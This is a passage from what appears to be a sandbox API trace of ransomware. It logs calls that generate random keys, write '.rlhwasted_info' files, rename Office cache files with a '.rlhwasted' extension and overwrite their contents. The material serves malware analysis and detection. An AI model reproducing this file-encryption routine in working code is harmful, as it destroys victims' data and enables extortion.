(hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.225] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.225] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.226] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.226] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.226] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6efcf0) returned 1 [0184.227] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.227] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.227] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.227] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.229] SetEndOfFile (hFile=0x128) returned 1 [0184.229] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.229] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.229] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.230] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.230] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.230] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x93a [0184.230] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a) returned 0x6a0000 [0184.230] CloseHandle (hObject=0x12c) returned 1 [0184.236] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6efcf0) returned 1 [0184.238] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x1b8, pbBuffer=0x6ef5c8 | out: pbBuffer=0x6ef5c8) returned 1 [0184.238] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.238] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6efcf0) returned 1 [0184.239] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.239] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.250] SetEndOfFile (hFile=0x128) returned 1 [0184.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.252] CloseHandle (hObject=0x128) returned 1 [0184.256] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.256] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed5b8 | out: hHeap=0x6b0000) returned 1 [0184.257] _aulldvrm () returned 0x0 [0184.257] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6efcf0) returned 1 [0184.258] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.258] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.258] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0184.258] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x6f1cf0 [0184.258] lstrcpyW (in: lpString1=0x6f1d94, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.258] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.258] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6efcf0) returned 1 [0184.259] CryptGenRandom (in: hProv=0x6efcf0, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.259] CryptReleaseContext (hProv=0x6efcf0, dwFlags=0x0) returned 1 [0184.259] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.260] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.262] SetEndOfFile (hFile=0x128) returned 1 [0184.262] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.262] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.262] lstrcpyW (in: lpString1=0x6f1d94, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.rlhwasted")) returned 1 [0184.263] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.263] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0184.263] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x4cf [0184.263] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cf) returned 0x6a0000 [0184.263] CloseHandle (hObject=0x124) returned 1 [0184.269] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.270] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6eb7c8 | out: pbBuffer=0x6eb7c8) returned 1 [0184.270] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.270] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.271] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.271] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.285] SetEndOfFile (hFile=0x128) returned 1 [0184.288] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.288] CloseHandle (hObject=0x128) returned 1 [0184.292] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1cf0 | out: hHeap=0x6b0000) returned 1 [0184.292] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e93e8 | out: hHeap=0x6b0000) returned 1 [0184.293] _aulldvrm () returned 0x0 [0184.293] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.294] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.294] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.294] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.294] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.294] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.294] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.294] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.295] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.295] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.295] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.295] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.297] SetEndOfFile (hFile=0x128) returned 1 [0184.297] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.297] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.297] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.298] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.298] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0184.298] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x73c [0184.298] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73c) returned 0x6a0000 [0184.298] CloseHandle (hObject=0x124) returned 1 [0184.302] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.303] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ef5c8 | out: pbBuffer=0x6ef5c8) returned 1 [0184.303] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.303] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.304] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.304] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.313] SetEndOfFile (hFile=0x128) returned 1 [0184.316] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.316] CloseHandle (hObject=0x128) returned 1 [0184.321] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.321] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed6b0 | out: hHeap=0x6b0000) returned 1 [0184.321] _aulldvrm () returned 0x0 [0184.321] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.322] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.322] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.322] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0184.322] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb780 [0184.323] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.323] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.323] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.339] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.340] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.340] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.344] WriteFile (in: hFile=0x110, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.345] SetEndOfFile (hFile=0x110) returned 1 [0184.345] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.345] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.345] lstrcpyW (in: lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.351] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.351] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0184.351] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1861 [0184.351] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1861) returned 0x6a0000 [0184.351] CloseHandle (hObject=0x124) returned 1 [0184.357] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.358] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6fd8d0 | out: pbBuffer=0x6fd8d0) returned 1 [0184.358] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.358] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.358] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.358] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.367] SetEndOfFile (hFile=0x110) returned 1 [0184.369] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x705f58 | out: hHeap=0x6b0000) returned 1 [0184.369] CloseHandle (hObject=0x110) returned 1 [0184.371] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.371] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed7a8 | out: hHeap=0x6b0000) returned 1 [0184.371] _aulldvrm () returned 0x0 [0184.371] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.372] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.372] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.372] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0184.372] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6eb780 [0184.372] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.372] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0184.372] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.373] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0184.373] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.373] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0184.374] WriteFile (in: hFile=0x110, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.375] SetEndOfFile (hFile=0x110) returned 1 [0184.375] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.375] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0184.375] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.rlhwasted")) returned 1 [0184.375] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0184.376] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.376] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x251f [0184.376] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x251f) returned 0x6a0000 [0184.376] CloseHandle (hObject=0x114) returned 1 [0184.385] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.386] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6edfe0 | out: pbBuffer=0x6edfe0) returned 1 [0184.386] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.386] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.387] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.387] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.395] SetEndOfFile (hFile=0x110) returned 1 [0184.398] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704360 | out: hHeap=0x6b0000) returned 1 [0184.398] CloseHandle (hObject=0x110) returned 1 [0184.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed8a0 | out: hHeap=0x6b0000) returned 1 [0184.404] _aulldvrm () returned 0x0 [0184.404] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.405] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.405] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0184.405] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x6f1cf0 [0184.405] lstrcpyW (in: lpString1=0x6f1d92, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.405] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0184.405] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.405] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0184.406] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.406] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 